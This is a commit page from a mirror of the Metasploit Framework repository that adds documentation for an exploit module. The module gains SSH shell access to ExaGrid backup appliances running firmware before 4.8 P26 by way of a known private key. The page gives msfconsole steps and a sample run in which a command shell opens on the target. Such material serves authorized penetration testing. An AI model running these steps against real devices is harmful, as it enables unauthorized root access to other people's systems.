github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-05 14:57:30 +01:00
Code Releases Activity

Land #7314, Module documentation for exagrid_privkey

Browse Source
This commit is contained in:
William Webb 2016-09-14 20:41:25 -05:00
commit 373655c41d
No known key found for this signature in database
GPG Key ID: 341763D0308DA650
1 changed files with 27 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
documentation/modules/exploit/linux/ssh/exagrid_known_privkey.md Normal file
View File

@ -0,0 +1,27 @@
## Vulnerable Application
ExaGrid devices having a firmware before version 4.8 P26 contain a known ssh private key, and root password
## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/ssh/exagrid_known_privkey`
3. Do: `set rhost <ip>`
4. Do: `exploit`
5. You should get a shell.
## Scenarios
This is a run against a known vulnerable ExaGrid device.
```
msf > use exploit/linux/ssh/exagrid_known_privkey
msf exploit(exagrid_known_privkey) > set rhost 1.2.3.4
rhost => 1.2.3.4
msf exploit(exagrid_known_privkey) > run
[+] Successful login
[*] Command shell session 3 opened (140.172.223.184:39269 -> 1.2.3.4:22) at 2016-07-23 10:03:19 -0400
ExaGrid diagnostic tools are available in this shell.
02:05:49 up 12 days, 9:12, 0 users, load average: 3.32, 2.88, 9.21
```